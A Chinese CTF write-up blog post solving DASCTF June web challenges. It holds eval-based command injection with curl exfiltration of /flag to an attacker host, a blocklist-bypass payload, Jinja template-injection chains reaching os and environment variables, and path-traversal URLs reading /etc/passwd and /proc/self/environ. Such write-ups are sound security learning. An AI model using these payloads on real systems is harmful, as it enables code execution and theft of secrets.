0x4qE's Blog 


DASCTF 六月团队赛


Web

简单的计算题1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
#!/usr/bin/env python3 # -*- coding: utf-8 -*-
from flask import Flask, render_template, request, session
from config import create
import os

app = Flask(__name__)
app.config['SECRET_KEY'] = os.urandom(
24)


##flag is in / flag
## try to get it
@app.route('/', methods=['GET', 'POST'])
def index():
def filter(string):
if "or" in string:
return "hack"
return string
if request.method == 'POST':
input = request.form['input']
create_question = create()
input_question = session.get('question')
session['question'] = create_question
if input_question == None:
return render_template('index.html', answer="Invalid session please try again!",
question=create_question)
if filter(input) == "hack":
return render_template('index.html', answer="hack", question=create_question)
try:
calc_result = str((eval(input_question + "=" + str(input))))
if calc_result == 'True':
result = "Congratulations"
elif calc_result == 'False':
result = "Error"
else:
result = "Invalid"
except:
result = "Invalid"
return render_template('index.html', answer=result, question=create_question)
if request.method == 'GET':
create_question = create()
session['question'] = create_question
return render_template('index.html', question=create_question) \


@ app.route('/source')
def source():
return open("app.py", "r").read()

if __name__ == '__main__':
app.run(host="0.0.0.0", debug=False)

简单的尝试以后发现过滤并不严格,然后看到代码第30行直接eval我们的输入,于是想到命令执行,源码里又送了我们一个os包,相当于白给。

学到了,用curlflag带出来

os.system("curl $IP:$Port/$(cat /flag | base64)")

简单的计算题2

源码改了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
#!/usr/bin/env python3 # -*- coding: utf-8 -*-
from flask import Flask, render_template, request, session
from config import black_list, create
import os

app = Flask(__name__)
app.config['SECRET_KEY'] = os.urandom(
24) ## flag is in /flag try to get it


@app.route('/', methods=['GET', 'POST'])
def index():
def filter(string):
for black_word in black_list:
if black_word in string:
return "hack"
return string
if request.method == 'POST':
input = request.form['input']
create_question = create()
input_question = session.get('question')
session['question'] = create_question
if input_question == None:
return render_template('index.html', answer="Invalid session please try again!",
question=create_question)
if filter(input) == "hack":
return render_template('index.html', answer="hack", question=create_question)
calc_str = input_question + "=" + str(input)
try:
calc_result = str((eval(calc_str)))
except Exception as ex:
calc_result = "Invalid"
return render_template('index.html', answer=calc_result, question=create_question)
if request.method == 'GET':
create_question = create()
session['question'] = create_question
return render_template('index.html', question=create_question) \

@ app.route('/source')
def source():
return open("app.py", "r").read()


if __name__ == '__main__': app.run(host="0.0.0.0", debug=False)

过滤了

1
2
3
4
5
6
7
8
9
10
os
system
import
eval
globals
mro
sys
builtins
requests
ls

根据函数的globals属性得到os模块,然后执行system把flag带出来

1
getattr(index, '__glob'+'al'+ 's__')['o'+'s'].__dict__['sy'+'stem']("curl $Ip:$Port/$(cat /flag | base64)")

easyflask

刚开始是RSA爆破,post一个N=xxxe=3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# -*- coding: cp936 -*-
import gmpy2

e = 3
# 读入 n, 密文
n= 22885480907469109159947272333565375109310485067211461543881386718201442106967914852474989176175269612229966461160065872310916096148216253429849921988412342732706875998100337754561586600637594798877898552625378551427864501926224989873772743227733285336042475675299391051376624685754547818835551263597996620383338263448888107691240136257201191331617560711786674975909597833383395574686942099700631002290836152972352041024137872983284691831292216787307841877839674258086005814225532597955826353796634417780156185485054141684249037538570742860026295194559710972266059844824388916869414355952432189722465103299013237588737
c= 93093632129499763319251847171119213886667085307489708438862645152665330699325997144584713454707870600509275960686735709591639970033445641927925408122103374638891963329234656451275172702578547244661634749316523997241595087303870057

print 'n=', n
print 'c=', c
print '[+]Detecting m...'

result = gmpy2.iroot(c, 3)
print ' [-]The c has cubic root?', result[1]
if result[1]: print ' [-]The m is:', '{:x}'.format(result[0]).decode('hex')

print '[!]All Done!'

跑完d33b0c00a9e921cf2c7667978841daa9,然后当token输入,进入登入界面,可以模板注入

拿到所有函数:

1
{{ request.args.str | attr(request.args.ccc) | attr(request.args.bases) | attr(request.args.sub) ()}}
1
http://183.129.189.60:10022/user/?str=a&ccc=__class__&bases=__base__&sub=__subclasses__

拿到os,在环境变量中找到Flag

payload

1
{{((request.args.str | attr(request.args.ccc) | attr(request.args.bases) | attr(request.args.sub)()).pop(387) | attr(request.args.ini) | attr(request.args.ggg))}}
1
http://183.129.189.60:10022/user/?str=a&ccc=__class__&bases=__base__&sub=__subclasses__&ini=__init__&ggg=__globals__

filecheck

不一定要.xyz结尾,只要在url最后出现了xyz就可以绕过判断

/readable/?file=challenge/test/../../flag&xyz

这个脑洞就离谱,想到既然有readablereader,为啥不试试read呢?还真成了!

/read/?file=../../../etc/passwd&xyz可以读了

读settings.py

http://183.129.189.60:10023/read/?file=hainep/settings.py&xyz

直接读环境变量,拿到flag

http://183.129.189.60:10023/read/?file=/proc/self/environ&xyz

后记

这场是颜表情( ´◔ ‸◔`)的胜利!






© - 0x4qE - 2019 - 2020 - Powered by hexo Themed by quark

浙ICP备19039917号-1
浙公网安备 33011802001799号

小破站跌跌撞撞